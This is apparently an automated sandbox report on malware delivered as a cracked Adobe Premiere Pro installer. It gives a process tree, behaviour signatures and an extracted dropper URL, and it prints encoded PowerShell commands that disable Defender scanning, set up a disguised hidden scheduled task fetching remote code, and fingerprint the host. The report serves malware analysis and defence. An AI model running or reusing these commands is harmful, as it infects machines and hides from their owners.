Resubmissions

22-11-2024 21:37

241122-1gl6jawkhp 10

22-11-2024 14:43

241122-r3xpqaymbl 10

Analysis

  • max time kernel
    134s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 21:37

General

  • Target

    https://premiere-pro-cracked.com/

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://t02un.cfd/online/tunupd.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Script User-Agent 6 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://premiere-pro-cracked.com/
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff96a2446f8,0x7ff96a244708,0x7ff96a244718
      2⤵
        PID:456
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
        2⤵
          PID:3940
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1672
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
          2⤵
            PID:4084
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
            2⤵
              PID:2688
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
              2⤵
                PID:1764
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
                2⤵
                  PID:1632
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1588
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
                  2⤵
                    PID:1700
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1
                    2⤵
                      PID:932
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
                      2⤵
                        PID:4220
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
                        2⤵
                          PID:4588
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
                          2⤵
                            PID:5060
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5984 /prefetch:8
                            2⤵
                              PID:4924
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
                              2⤵
                                PID:4092
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5268 /prefetch:8
                                2⤵
                                  PID:4384
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,14623717354579799189,6867974472784931712,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6376 /prefetch:8
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3028
                                • C:\Users\Admin\Downloads\AdobePremierePro25.exe
                                  "C:\Users\Admin\Downloads\AdobePremierePro25.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:2288
                                  • C:\Users\Admin\AppData\Local\Temp\is-RJRDJ.tmp\AdobePremierePro25.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-RJRDJ.tmp\AdobePremierePro25.tmp" /SL5="$120054,94638087,864256,C:\Users\Admin\Downloads\AdobePremierePro25.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:3888
                                • C:\Users\Admin\Downloads\AdobePremierePro25.exe
                                  "C:\Users\Admin\Downloads\AdobePremierePro25.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5032
                                  • C:\Users\Admin\AppData\Local\Temp\is-RH5AL.tmp\AdobePremierePro25.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-RH5AL.tmp\AdobePremierePro25.tmp" /SL5="$3025A,94638087,864256,C:\Users\Admin\Downloads\AdobePremierePro25.exe"
                                    3⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:316
                                    • C:\Windows\SysWOW64\CMD.exe
                                      "CMD" /C "C:\Users\Admin\AppData\Roaming\AdobePremierePro25\YardConstantly.7z.bat"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:816
                                      • C:\Users\Admin\AppData\Roaming\AdobePremierePro25\7z.exe
                                        "C:\Users\Admin\AppData\Roaming\AdobePremierePro25\7z.exe" x -aoa "C:\Users\Admin\AppData\Roaming\AdobePremierePro25\YardConstantly.7z" -p"8ac600c4b78" -o"C:\Users\Admin\AppData\Roaming\AdobePremierePro25\"
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4924
                                    • C:\Windows\SysWOW64\CMD.exe
                                      "CMD" /C del "C:\Users\Admin\AppData\Roaming\AdobePremierePro25\YardConstantly.7z.bat"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4416
                                    • C:\Windows\SysWOW64\CMD.exe
                                      "CMD" /C del "YardConstantly.7z"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2984
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd" /C "C:\Users\Admin\AppData\Roaming\AdobePremierePro25\Set-up.exe"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1972
                                      • C:\Users\Admin\AppData\Roaming\AdobePremierePro25\Set-up.exe
                                        C:\Users\Admin\AppData\Roaming\AdobePremierePro25\Set-up.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Modifies Internet Explorer settings
                                        • Modifies system certificate store
                                        PID:1948
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoLogo -NonInteractive -ep Bypass -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAOwAKAHMAdABhAHIAdAAtAHMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMAA7AAoA"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:544
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoLogo -NonInteractive -ep Bypass -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAOwAKAHMAdABhAHIAdAAtAHMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMAA7AAoA
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1848
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c "powershell -nop -NoLogo -NonInteractive -ep Bypass -enc JABMAGkAbgBrAE8AbgBlAFIAIAA9ACAAJwBKAEEAQgBNAEEARwBrAEEAYgBnAEIAcgBBAEUAawBBAFIAUQBCAFkAQQBDAEEAQQBQAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEIAeQBBAEcAVQBBAFkAdwBCAGkAQQBHAEUAQQBMAGcAQgBrAEEARwBrAEEAWgB3AEIAcABBAEgAUQBBAFkAUQBCAHMAQQBDAGMAQQBPAHcAQQBLAEEAQwBRAEEAUQB3AEEAOQBBAEcAawBBAGQAdwBCAHkAQQBDAEEAQQBKAEEAQgBNAEEARwBrAEEAYgBnAEIAcgBBAEUAawBBAFIAUQBCAFkAQQBDAEEAQQBMAFEAQgBWAEEASABNAEEAUgBRAEIAQwBBAEcARQBBAFUAdwBCAEoAQQBHAE0AQQBVAEEAQgBCAEEASABJAEEAYwB3AEIAcABBAEUANABBAFoAdwBBAGcAQQBIAHcAQQBhAFEAQgBsAEEASABnAEEATwB3AEEAPQAnADsACgAkAFQAIAA9ACAARwBlAHQALQBEAGEAdABlADsACgAkAEQAMQAgAD0AIAAkAFQALgBEAGEAeQBPAGYAVwBlAGUAawA7AAoAJABEADIAIAA9ACAAJABUAC4AQQBkAGQARABhAHkAcwAoADEAKQA7AAoAJABEADIAIAA9ACAAJABEADIALgBEAGEAeQBPAGYAVwBlAGUAawA7AAoAJABUACAAPQAgACQAVAAuAEEAZABkAE0AaQBuAHUAdABlAHMAKAAxADgAKQA7AAoAJABUADEAIAA9ACAAJABUAC4AQQBkAGQATQBpAG4AdQB0AGUAcwAoADMANwApADsACgAkAFQAUgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0ACAAJABUADEAIAAtAFcAZQBlAGsAbAB5ACAALQBEAGEAeQBzAE8AZgBXAGUAZQBrACAAJABEADEALAAkAEQAMgA7AAoAJABQAFMAIAA9ACAAJABlAG4AdgA6AHcAaQBuAGQAaQByACsAIgBcAFMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgA7AAoAJABBACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAUABTACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAHAAIAAtAGUAbgBjACAAJABMAGkAbgBrAE8AbgBlAFIAIgA7AAoAJABQACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBQAHIAaQBuAGMAaQBwAGEAbAAgAC0AVQBzAGUAcgAgACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAIAAtAEwAbwBnAG8AbgBUAHkAcABlACAAUwA0AFUAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQACgAkAFMAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0ATQB1AGwAdABpAHAAbABlAEkAbgBzAHQAYQBuAGMAZQBzACAAUABhAHIAYQBsAGwAZQBsACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEgAaQBkAGQAZQBuADsACgAkAFQATgAgAD0AIAAiAEcARAByAGkAdgBlACAAQgBhAGMAawB1AHAAIABTAHkAbgBjACIAOwAKAFUAbgByAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQARgBhAGwAcwBlADsACgBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVABSACAALQBBAGMAdABpAG8AbgAgACQAQQAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTACAALQBQAHIAaQBuAGMAaQBwAGEAbAAgACQAUAA7AA=="
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2320
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nop -NoLogo -NonInteractive -ep Bypass -enc JABMAGkAbgBrAE8AbgBlAFIAIAA9ACAAJwBKAEEAQgBNAEEARwBrAEEAYgBnAEIAcgBBAEUAawBBAFIAUQBCAFkAQQBDAEEAQQBQAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEIAeQBBAEcAVQBBAFkAdwBCAGkAQQBHAEUAQQBMAGcAQgBrAEEARwBrAEEAWgB3AEIAcABBAEgAUQBBAFkAUQBCAHMAQQBDAGMAQQBPAHcAQQBLAEEAQwBRAEEAUQB3AEEAOQBBAEcAawBBAGQAdwBCAHkAQQBDAEEAQQBKAEEAQgBNAEEARwBrAEEAYgBnAEIAcgBBAEUAawBBAFIAUQBCAFkAQQBDAEEAQQBMAFEAQgBWAEEASABNAEEAUgBRAEIAQwBBAEcARQBBAFUAdwBCAEoAQQBHAE0AQQBVAEEAQgBCAEEASABJAEEAYwB3AEIAcABBAEUANABBAFoAdwBBAGcAQQBIAHcAQQBhAFEAQgBsAEEASABnAEEATwB3AEEAPQAnADsACgAkAFQAIAA9ACAARwBlAHQALQBEAGEAdABlADsACgAkAEQAMQAgAD0AIAAkAFQALgBEAGEAeQBPAGYAVwBlAGUAawA7AAoAJABEADIAIAA9ACAAJABUAC4AQQBkAGQARABhAHkAcwAoADEAKQA7AAoAJABEADIAIAA9ACAAJABEADIALgBEAGEAeQBPAGYAVwBlAGUAawA7AAoAJABUACAAPQAgACQAVAAuAEEAZABkAE0AaQBuAHUAdABlAHMAKAAxADgAKQA7AAoAJABUADEAIAA9ACAAJABUAC4AQQBkAGQATQBpAG4AdQB0AGUAcwAoADMANwApADsACgAkAFQAUgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0ACAAJABUADEAIAAtAFcAZQBlAGsAbAB5ACAALQBEAGEAeQBzAE8AZgBXAGUAZQBrACAAJABEADEALAAkAEQAMgA7AAoAJABQAFMAIAA9ACAAJABlAG4AdgA6AHcAaQBuAGQAaQByACsAIgBcAFMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgA7AAoAJABBACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAUABTACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAHAAIAAtAGUAbgBjACAAJABMAGkAbgBrAE8AbgBlAFIAIgA7AAoAJABQACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBQAHIAaQBuAGMAaQBwAGEAbAAgAC0AVQBzAGUAcgAgACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAIAAtAEwAbwBnAG8AbgBUAHkAcABlACAAUwA0AFUAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQACgAkAFMAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0ATQB1AGwAdABpAHAAbABlAEkAbgBzAHQAYQBuAGMAZQBzACAAUABhAHIAYQBsAGwAZQBsACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEgAaQBkAGQAZQBuADsACgAkAFQATgAgAD0AIAAiAEcARAByAGkAdgBlACAAQgBhAGMAawB1AHAAIABTAHkAbgBjACIAOwAKAFUAbgByAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQARgBhAGwAcwBlADsACgBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVABSACAALQBBAGMAdABpAG8AbgAgACQAQQAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTACAALQBQAHIAaQBuAGMAaQBwAGEAbAAgACQAUAA7AA==
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:848
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c "powershell -nop -NoLogo -NonInteractive -ep Bypass -enc JABIAFcASQBEAEQAQQBUACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAKwAnAFwAaAB3AGkAZAAuAGQAYQB0ACcAOwAKACQASABXAEkARABTAFIAQwAgAD0AIAAkAEgAVwBJAEQARABBAFQAOwAKAGkAZgAoAC0ATgBvAHQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAAJABIAFcASQBEAEQAQQBUACkAKQB7ACQASABXAEkARABTAFIAQwAgAD0AIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQArACcAXABoAHcAaQBkAC4AZABhAHQAJwA7ACQAVwByAGkAdABlAEYAaQBsAGUAPQAnAHkAZQBzACcAOwB9ADsACgAkAEgAVwBJAEQAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABIAFcASQBEAFMAUgBDADsACgBpAGYAKAAtAE4ATwBUACgAJABIAFcASQBEAC4AbABlAG4AZwB0AGgAIAAtAGUAcQAgADMAMgApACkAewAKACQAcwB5AHMAUAByAG8AZAAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtAFAAcgBvAGQAdQBjAHQAOwAKACQAdQB1AGkAZAAgAD0AIAAkAHMAeQBzAFAAcgBvAGQALgBVAFUASQBEADsACgBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAEgAVwBJAEQARABBAFQAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlACsAJAB1AHUAaQBkACIAOwAKACQATQBEADUAIAA9ACAARwBlAHQALQBGAGkAbABlAEgAYQBzAGgAIAAkAEgAVwBJAEQARABBAFQAIAAtAEEAbABnAG8AcgBpAHQAaABtACAATQBEADUAOwAKACQASABXAEkARAAgAD0AIAAkAE0ARAA1AC4ASABhAHMAaAAuAHQAbwBMAG8AdwBlAHIAKAApADsACgAkAFcAcgBpAHQAZQBGAGkAbABlAD0AJwB5AGUAcwAnADsACgB9ADsACgBpAGYAKAAkAFcAcgBpAHQAZQBGAGkAbABlACAALQBlAHEAIAAnAHkAZQBzACcAKQB7AFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQASABXAEkARABEAEEAVAAgAC0AVgBhAGwAdQBlACAAJABIAFcASQBEADsAfQA7AA=="
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1600
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nop -NoLogo -NonInteractive -ep Bypass -enc JABIAFcASQBEAEQAQQBUACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAKwAnAFwAaAB3AGkAZAAuAGQAYQB0ACcAOwAKACQASABXAEkARABTAFIAQwAgAD0AIAAkAEgAVwBJAEQARABBAFQAOwAKAGkAZgAoAC0ATgBvAHQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAAJABIAFcASQBEAEQAQQBUACkAKQB7ACQASABXAEkARABTAFIAQwAgAD0AIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQArACcAXABoAHcAaQBkAC4AZABhAHQAJwA7ACQAVwByAGkAdABlAEYAaQBsAGUAPQAnAHkAZQBzACcAOwB9ADsACgAkAEgAVwBJAEQAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABIAFcASQBEAFMAUgBDADsACgBpAGYAKAAtAE4ATwBUACgAJABIAFcASQBEAC4AbABlAG4AZwB0AGgAIAAtAGUAcQAgADMAMgApACkAewAKACQAcwB5AHMAUAByAG8AZAAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtAFAAcgBvAGQAdQBjAHQAOwAKACQAdQB1AGkAZAAgAD0AIAAkAHMAeQBzAFAAcgBvAGQALgBVAFUASQBEADsACgBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAEgAVwBJAEQARABBAFQAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlACsAJAB1AHUAaQBkACIAOwAKACQATQBEADUAIAA9ACAARwBlA